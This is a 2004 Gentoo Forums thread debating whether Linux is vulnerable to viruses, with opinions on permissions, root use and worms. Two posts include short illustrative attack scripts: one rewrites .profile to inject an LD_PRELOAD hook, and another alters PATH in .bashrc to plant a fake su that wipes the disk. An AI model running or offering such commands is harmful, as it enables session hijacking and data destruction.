Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
viruses on linux
View unanswered posts
View posts from last 24 hours

Goto page 1, 2  Next  
Reply to topic    Gentoo Forums Forum Index Off the Wall
View previous topic :: View next topic  

Have you (or your computer) been infected with linux viruses?
Yes!
0%
 0%  [ 1 ]
No!
99%
 99%  [ 113 ]
Total Votes : 114

Author Message
fisherking
Tux's lil' helper
Tux's lil' helper


Joined: 12 Nov 2003
Posts: 111

PostPosted: Wed Oct 27, 2004 10:36 am    Post subject: viruses on linux Reply with quote

Hi,
I recently read a article about linux security vs. windows security and there was some discussion about viruses. I could find any information about how many viruses there is for linux.

How many of you have experince viruses (and/or worms) on linux and is there anyone who knows any good statistic about linux viruses?


personally I have never experiance anything like virus- or vorm-related under my six years as a linux user....
Back to top
View user's profile Send private message
Deranger
Veteran
Veteran


Joined: 26 Aug 2004
Posts: 1215

PostPosted: Wed Oct 27, 2004 10:40 am    Post subject: Reply with quote

Nah, last time I had viruses on my comp, I used Windows ;)
Back to top
View user's profile Send private message
placeholder
Advocate
Advocate


Joined: 07 Feb 2004
Posts: 2500

PostPosted: Wed Oct 27, 2004 10:41 am    Post subject: Reply with quote

Oktane wrote:
Nah, last time I had viruses on my comp, I used Windows ;)

Same here. Permissions kind of kill idea of malicious viruses in Linux. :wink:
Back to top
View user's profile Send private message
SecretSquirrel
n00b
n00b


Joined: 26 Oct 2004
Posts: 4

PostPosted: Wed Oct 27, 2004 12:09 pm    Post subject: Reply with quote

Google is your friend

http://www.google.com/search?hl=en&q=linux+virus


6th link down, just a small sample

http://www.viruslibrary.com/virusinfo/Linux.htm


Virii are able to be written and run on Linux, so get over yourself. I haven't had a virus on Linux OR Windows for 10 years now.
Back to top
View user's profile Send private message
RdsArts
Apprentice
Apprentice


Joined: 08 Oct 2002
Posts: 190
Location: MI, USA

PostPosted: Wed Oct 27, 2004 12:11 pm    Post subject: Reply with quote

*sigh*

Code:
#!/bin/sh
echo #!/bin/sh > .profile_bad_malicious
echo LD_PRELOAD=${HOME}/.evil_bad_virus_that_remaps_write_in_libc >> .profile_bad_malicious
cat .profile >> .profile_bad_malicious
mv .profile_bad_malicious .profile

Permissions != cure all. Expectally when you install everything by giving unknown code full access as root on your system.
Back to top
View user's profile Send private message
Aleksejs
n00b
n00b


Joined: 26 Oct 2004
Posts: 7
Location: Imanta, Riga, Latvia

PostPosted: Wed Oct 27, 2004 12:20 pm    Post subject: Reply with quote

While I voted "No" I must say that "I don't know, really" since I don't have antivirus or IDS installed on mylinux box. So there is no way I can tell. Not all viruses do easy noticable damage to your files or consume noticable amounts of resources (memory, bandwidth etc).
Back to top
View user's profile Send private message
monkeyhead
Tux's lil' helper
Tux's lil' helper


Joined: 19 Mar 2004
Posts: 97
Location: hella-where?

PostPosted: Wed Oct 27, 2004 12:53 pm    Post subject: Reply with quote

i haven't had a problem... but, yeah, i agree that linux is not virus proof.
Back to top
View user's profile Send private message
miqorz
Veteran
Veteran


Joined: 04 Apr 2004
Posts: 1170
Location: Pissing into the wind.

PostPosted: Wed Oct 27, 2004 1:55 pm    Post subject: Reply with quote

Well to get a virus you'd need to run something as root, and the only things I do as root is emerge and config X or grub or MAYBE install a new kernel.
Back to top
View user's profile Send private message
gullyg
Tux's lil' helper
Tux's lil' helper


Joined: 22 Jun 2004
Posts: 105
Location: Edinburgh

PostPosted: Wed Oct 27, 2004 3:59 pm    Post subject: Reply with quote

miqorz wrote:
Well to get a virus you'd need to run something as root, and the only things I do as root is emerge and config X or grub or MAYBE install a new kernel.


Same here - but will we hear alot more "linux is as vunerable as windows" if distros follow the linspire route and encourage users to use root all the time. After all it does make using linux easyier for a new user.
_________________
Not Y3K compliant

CPCFF
Back to top
View user's profile Send private message
Ari Rahikkala
Guru
Guru


Joined: 02 Oct 2002
Posts: 370
Location: Finland

PostPosted: Wed Oct 27, 2004 4:13 pm    Post subject: Reply with quote

What Aleksejs said. I'd love to say "no, no viruses here" and I believe that is the case since I do keep my system pretty much up to date (especially everything that you can connect to from the rest of the world)... but I can't afford to think that I'm 100% secure. I know I haven't taken everything into account (for instance, I haven't read the source code of all of the software I'm using, and I haven't checked my gcc binary for the kind of hack that you can read about in "Reflections on trusting trust", and I haven't checked the CPU microcode, and...) It just doesn't happen unless I turn off this box.
_________________
<laurentius> gentoo linux?
<ari> Yesh.
<laurentius> they look horny
Back to top
View user's profile Send private message
feld
Guru
Guru


Joined: 29 Aug 2004
Posts: 593
Location: WI, USA

PostPosted: Wed Oct 27, 2004 4:25 pm    Post subject: Reply with quote

thats why i use linux. no viruses running rampant, and no spyware.

according to Webroot - they have YET to detect a single spyware/malware to exist on a mac or linux operating system.

take that, yah filthy winders!


-Feld
Back to top
View user's profile Send private message
frogb
n00b
n00b


Joined: 21 Sep 2003
Posts: 50

PostPosted: Wed Oct 27, 2004 4:38 pm    Post subject: Reply with quote

Run this as non-root, and carry on your normal work if it can't affect your system. (rm changed to RM)
Quote:

#!/bin/sh

echo "PATH=\"~:$PATH\"" >> ~/.bashrc

cat > ~/su << EOF
#!/bin/sh
/bin/su -c "RM -rf / >/dev/null"
EOF

chmod 755 ~/su
Back to top
View user's profile Send private message
nyteryda
Guru
Guru


Joined: 26 Jul 2003
Posts: 337
Location: London

PostPosted: Wed Oct 27, 2004 4:50 pm    Post subject: Reply with quote

miqorz wrote:
Well to get a virus you'd need to run something as root, and the only things I do as root is emerge and config X or grub or MAYBE install a new kernel.


Thats actually not true.

Worms for example which are virus that execute without user action, might and have been writen to exploit security holes in various running server programs for example the Open_SSL in Apache, now these programs might not bebale to "rm -rf / " they can however still propergate on do damage, say to your website or perhaps even run futher exploits to raise they user level.

However Linux Virus are few and far between (at present) compared to Windows, and tend to required more work to be effective.

N.B people tend to define viruses differently but the defintion of worm as i belive is correct to most people
_________________
Code:
#include "forums.h"
     int main() {while (bollox) postcount++;}
Back to top
View user's profile Send private message
codergeek42
Bodhisattva
Bodhisattva


Joined: 05 Apr 2004
Posts: 5142
Location: Anaheim, CA (USA)

PostPosted: Wed Oct 27, 2004 4:54 pm    Post subject: Reply with quote

If you're running server processes though, it's usually a more secure idea to run them as their own user and in a chroot-jail, isn't it?
_________________
~~ Peter: Programmer, Mathematician, STEM & Free Software Advocate, Enlightened Agent, Transhumanist, Fedora contributor
Who am I? :: EFF & FSF
Back to top
View user's profile Send private message
nyteryda
Guru
Guru


Joined: 26 Jul 2003
Posts: 337
Location: London

PostPosted: Wed Oct 27, 2004 5:14 pm    Post subject: Reply with quote

codergeek42 wrote:
If you're running server processes though, it's usually a more secure idea to run them as their own user and in a chroot-jail, isn't it?


Yes, but that depends on weather its possible/practical too, If you want public_html in users home directorys and stuff then that really becomes more of a problem particually if you want to mix different servers and access to different user say FTP and WWW, it also doesn't necessarily stop virus'es from propergateing (and working as relays too maybe) , also if we are making honest comparison to windows there are things things you can do in windows to reduce virus risk, and setup limit user accounts so really we need to look at it from a more normal setup than a security conscieous and knowledgeable one or we have to look at windows in its most secure state and not its default state.
_________________
Code:
#include "forums.h"
     int main() {while (bollox) postcount++;}
Back to top
View user's profile Send private message
SecretSquirrel
n00b
n00b


Joined: 26 Oct 2004
Posts: 4

PostPosted: Wed Oct 27, 2004 5:36 pm    Post subject: Reply with quote

nyteryda wrote:
codergeek42 wrote:
If you're running server processes though, it's usually a more secure idea to run them as their own user and in a chroot-jail, isn't it?


Yes, but that depends on weather its possible/practical too, If you want public_html in users home directorys and stuff then that really becomes more of a problem particually if you want to mix different servers and access to different user say FTP and WWW, it also doesn't necessarily stop virus'es from propergateing (and working as relays too maybe) , also if we are making honest comparison to windows there are things things you can do in windows to reduce virus risk, and setup limit user accounts so really we need to look at it from a more normal setup than a security conscieous and knowledgeable one or we have to look at windows in its most secure state and not its default state.


Which leads to the ultimate realization that anyone in the computer security world worth 2 pennies states: Security is not a quality, but a process.
Back to top
View user's profile Send private message
ChojinDSL
l33t
l33t


Joined: 07 Jul 2003
Posts: 784

PostPosted: Wed Oct 27, 2004 5:51 pm    Post subject: Reply with quote

Never had a virus on linux either. But I think the linux community is taking the matter not seriously enough. As it stands now, perhaps a linux virus is not an immediate threat, but I think its only a matter of time before we see some "progress" made in this area.

Because of the solid multi user system that linux has, i.e. default is non root user mode. I think a virus might have little chance IF everything works as it should. However, I dont see why a virus couldnt make use of an exploit just like any other hacker.

Maybe in the future what we will se on linux is not a virus in the classical sense, but perhaps an automated hack/exploit/rootkit attack.

Imagine if someone where to write a virus, which targets windows pcs as first step only. Takes over the machine, and while idle and online launches a "hacker-like" attack on any linux machines it can find. Perhaps it would check if you have something like putty installed and see which ssh servers you have saved in there.
Of course if its on a mixed network, it wouldnt even have to do that.

All I'm saying is, just because its not a problem at the moment, we shouldnt be resting on our laurels.

Remember, "assumption is the mother of all f*ck-ups".
Back to top
View user's profile Send private message
codergeek42
Bodhisattva
Bodhisattva


Joined: 05 Apr 2004
Posts: 5142
Location: Anaheim, CA (USA)

PostPosted: Wed Oct 27, 2004 5:55 pm    Post subject: Reply with quote

ChojinDSL wrote:
However, I dont see why a virus couldnt make use of an exploit just like any other hacker.
$what_you_just_said ~= s/hacker/cracker/ig;
Quote:
Remember, "assumption is the mother of all f*ck-ups".
I like that quote.
_________________
~~ Peter: Programmer, Mathematician, STEM & Free Software Advocate, Enlightened Agent, Transhumanist, Fedora contributor
Who am I? :: EFF & FSF
Back to top
View user's profile Send private message
nyteryda
Guru
Guru


Joined: 26 Jul 2003
Posts: 337
Location: London

PostPosted: Wed Oct 27, 2004 6:18 pm    Post subject: Reply with quote

ChojinDSL wrote:

Maybe in the future what we will se on linux is not a virus in the classical sense, but perhaps an automated hack/exploit/rootkit attack.

I belive that is actually one type of virus in a clasical sense, a worm.

Quote:

Imagine if someone where to write a virus, which targets windows pcs as first step only. Takes over the machine, and while idle and online launches a "hacker-like" attack on any linux machines it can find. Perhaps it would check if you have something like putty installed and see which ssh servers you have saved in there.
Of course if its on a mixed network, it wouldnt even have to do that.

What i think would be interesting is a modular worm that once its installed on a computer it has file sharing network capabilities like kazza or emule or something, it scans host machines for programs that may contain information Outlook (or putty like you said) downloads modules for getting data then starts scanning random IP address'es and their services to determin OS's and server applications then downloads relevent modules for attacking based on the scan results, like a ssh/IIS/apache/ attacks which ever relevent. I don't know maybe thats a bit farfetched ?

Quote:

All I'm saying is, just because its not a problem at the moment, we shouldnt be resting on our laurels.

I totally agree, With more and more servers being linux more and more virus will occur, just probably not the same kind of email virus that plagues linux.
_________________
Code:
#include "forums.h"
     int main() {while (bollox) postcount++;}
Back to top
View user's profile Send private message
dumpsterm0uth
n00b
n00b


Joined: 26 Feb 2003
Posts: 45

PostPosted: Wed Oct 27, 2004 7:34 pm    Post subject: Reply with quote

never had a virus, never will ;), i assume people can make them in c++, but who would want to waste there time?
_________________
www.emergelife.com - my linux world, please help my community get big :o.
Back to top
View user's profile Send private message
Naughtyus
Guru
Guru


Joined: 14 Jul 2002
Posts: 463
Location: Vancouver, BC

PostPosted: Wed Oct 27, 2004 7:47 pm    Post subject: Reply with quote

I got rooted through a proftp hole 4 or 5 years ago
Back to top
View user's profile Send private message
miqorz
Veteran
Veteran


Joined: 04 Apr 2004
Posts: 1170
Location: Pissing into the wind.

PostPosted: Wed Oct 27, 2004 8:14 pm    Post subject: Reply with quote

Naughtyus wrote:
I got rooted through a proftp hole 4 or 5 years ago


Thats not a virus. It's called getting owned for being a dumbass.
Back to top
View user's profile Send private message
Stormy Eyes
Veteran
Veteran


Joined: 09 Apr 2003
Posts: 1064
Location: Watching God spit-shine my boots.

PostPosted: Wed Oct 27, 2004 8:16 pm    Post subject: Reply with quote

miqorz wrote:
Thats not a virus. It's called getting owned for being a dumbass.


Chill out, miqorz. It was 4 or 5 years ago, when he was probably a newbie. He's learned from his mistake.
Back to top
View user's profile Send private message
miqorz
Veteran
Veteran


Joined: 04 Apr 2004
Posts: 1170
Location: Pissing into the wind.

PostPosted: Wed Oct 27, 2004 8:18 pm    Post subject: Reply with quote

Stormy Eyes wrote:
miqorz wrote:
Thats not a virus. It's called getting owned for being a dumbass.


Chill out, miqorz. It was 4 or 5 years ago, when he was probably a newbie. He's learned from his mistake.


I'm on edge today, but seriously. That's not a virus.

Past mistakes are fine and dandy but mistaking that for a virus even 5 years after the fact is stupid.
Back to top
View user's profile Send private message
homeobocks
Guru
Guru


Joined: 19 Dec 2003
Posts: 345
Location: I'm from Canada, and they say I'm a little slow . . . eh?

PostPosted: Wed Oct 27, 2004 11:15 pm    Post subject: Reply with quote

I love Bliss (, a Linux virus). Bliss (, a Linux virus) keeps a log of all files infected, and, with a command line argument, you can disinfect all infected files. Although, technically, it is a virus-like trojan with worm-like features.
_________________
HOW DO I SHOT WEB
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Off the Wall All times are GMT
Goto page 1, 2  Next
Page 1 of 2

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum